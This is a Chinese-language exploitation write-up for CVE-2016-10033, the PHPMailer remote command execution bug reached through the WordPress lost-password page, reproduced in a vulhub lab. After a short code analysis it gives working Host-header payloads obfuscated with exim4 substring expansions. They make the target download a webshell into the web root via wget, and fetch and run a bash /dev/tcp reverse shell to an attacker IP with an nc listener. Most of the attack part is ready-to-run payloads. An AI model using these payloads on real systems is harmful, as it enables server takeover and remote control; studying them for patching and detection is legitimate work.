漏洞信息
这个锅还是要PHPMailer背(CVE-2016-10033,WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,造成远程命令执行的危害。
漏洞编号
CVE-2016-10033 [https://paper.seebug.org/161/](https://paper.seebug.org/161/)
影响版本
WordPress <= 4.7.1
PHPMailer < 5.2.18
复现环境
https://github.com/vulhub/vulhub/tree/master/wordpress/pwnscriptum
漏洞分析
漏洞出现在管理员的密码重置界面/wp-login.php?action=lostpassword
在找回密码时WordPress会使用PHPmailer发送重置密码的邮件,这个时候PHPmailer<=5.2.18时存在RCE。
打开/wp-includes/class-phpmailer.php中:
public $Mailer = 'mail';
/**
* The path to the sendmail program.
* @var string
*/
public $Sendmail = '/usr/sbin/sendmail';
由代码可以看出PHPmailer调用的是/usr/sbin/semdmail来发送邮件的。
发送邮件的命令格式为:sendmail -t -i -fusername@hostname
/**
* Get the server hostname.
* Returns 'localhost.localdomain' if unknown.
* @access protected
* @return string
*/
protected function serverHostname()
{
$result = 'localhost.localdomain';
if (!empty($this->Hostname)) {
$result = $this->Hostname;
} elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) {
$result = $_SERVER['SERVER_NAME'];
} elseif (function_exists('gethostname') && gethostname() !== false) {
$result = gethostname();
} elseif (php_uname('n') !== false) {
$result = php_uname('n');
}
return $result;
}
serverHostname函数通过传入的SERVER_NAME参数来获取主机名,该主机名即HTTP请求报文中的host值,但是SERVER_NAME参数并没有经过任何过滤,因此我们可以进行任意构造拼接,从而产生了系统命令注入漏洞。
sendmail 提供了-O 和-X参数。 -OQueueDirectory=/tmp/ -X/tmp/aaa.php它会将发送的邮件保存到/tmp/aaa.php中。
因此我们可以构造以下payload:
POST /wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: aaa( -X/tmp/aaa.php )@qq.com
这里Host字段值中@符号前用了一个”( )”,这样可以直接在括号中使用空格,具体大家可以看P神博客的两篇文章。
https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html
https://www.leavesongs.com/PENETRATION/how-to-analyze-long-regex.html
但是由于WordPress以及PHPMailer都会防止攻击者注入空字符。并且host字段值中出现’/'会出现请求错误。
可以看到在ubuntu中已经使用exim4替代了sendmail的功能。
root@990b6f7e34bb:/var/www/html/wp-includes# which sendmail
/usr/sbin/sendmail
root@990b6f7e34bb:/var/www/html/wp-includes# file /usr/sbin/sendmail
/usr/sbin/sendmail: symbolic link to `exim4'
在exim4中有一个-be参数可以读取一些变量的数据:
root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$tod_log'
2018-08-23 10:22:21
root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$spool_directory'
/var/spool/exim4
exim4还支持一些函数用来执行一些命令:
root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '$spool_directory'
/var/spool/exim4
root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '${substr{0}{1}{$spool_directory}}'
/
从第一个字符开始截取,然后截取长度为1,刚好可以把’/’截取出来
因此我们可以将:
空格 —> ${substr{10}{1}{$tod_log}}
/ —> ${substr{0}{1}{$spool_directory}}
$run还可以调用系统命令:
root@990b6f7e34bb:/var/www/html/wp-includes# sendmail -be '${run{/usr/bin/id}}'
uid=0(root) gid=105(Debian-exim) groups=0(root)
比如我们此时想执行在/tmp下创建一个test.php
aa(any -froot@localhost -be ${run{/bin/touch /tmp/test.php}} null)
==>
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}test.php}} null)
此时在重置密码处输入用户名admin,然后使用BurpSuite抓包拦截,修改host的值:
在/tmp下文件创建成功。
root@990b6f7e34bb:/tmp# ls -al
total 8
drwxrwxrwt 1 root root 4096 Aug 23 10:46 .
drwxr-xr-x 1 root root 4096 Aug 23 08:48 ..
-rw—---- 1 www-data www-data 0 Aug 23 10:44 test.php
实际利用的过程中还需要注意一下几点:
1、执行的命令不能包含大量特殊字符比如 :、引号等等。
2、命令会被转换为小写字母
3、命令需要使用绝对路径
4、需要知道一个存在的用户名,比如admin.
实战利用
一、写webshell
场景描述:
攻击机器IP: 172.18.0.1
目标靶机IP: 172.18.0.3
攻击机器开启web服务,172.18.0.1/zk/one.txt内容如下:
利用步骤:
1、发送payload使目标靶机下载one.txt,并保存到web根目录下/var/www/html/shell.php
2、使用菜刀链接shell.php
1、下载one.txt
aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /var/www/html/shell.php 172.18.0.1/zk/one.txt}} null)
==>
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}var${substr{0}{1}{$spool_directory}}www${substr{0}{1}{$spool_directory}}html${substr{0}{1}{$spool_directory}}shell.php${substr{10}{1}{$tod_log}}172.18.0.1${substr{0}{1}{$spool_directory}}zk${substr{0}{1}{$spool_directory}}one.txt}} null)
2、使用菜刀链接:
二、反弹shell
场景描述:
攻击机器IP: 172.18.0.1
目标靶机IP: 172.18.0.3
攻击机器开启web服务,172.18.0.1/zk/shell.txt内容如下:
bash -i >& /dev/tcp/172.18.0.1/7001 0>&1
利用步骤:
1、发送payload使靶机下载shell.txt,并保存到/tmp/shell
2、在攻击机器上使用nc监听7001端口
3、发送payload使靶机运行shell
注意:远程 URL 中不能有 http://,并且所有字母必须小写。
1、下载远程服务器上的脚本文件payload:
aa(any -froot@localhost -be ${run{/usr/bin/wget --output-document /tmp/shell 172.18.0.1/zk/shell.txt}} null)
==>
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}172.18.0.1${substr{0}{1}{$spool_directory}}zk${substr{0}{1}{$spool_directory}}shell.txt}} null)
2、在172.18.0.1上执行 nc -lvp 7001开启监听:
3、发送payload使靶机运行shel:
aa(any -froot@localhost -be ${run{/bin/bash /tmp/shell}} null)
==>
aa(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
Reference
https://github.com/vulhub/vulhub/tree/master/wordpress/pwnscriptum
https://www.cnblogs.com/ssooking/p/8893264.html
https://www.leavesongs.com/PENETRATION/how-to-analyze-long-regex.html
https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html
https://paper.seebug.org/161/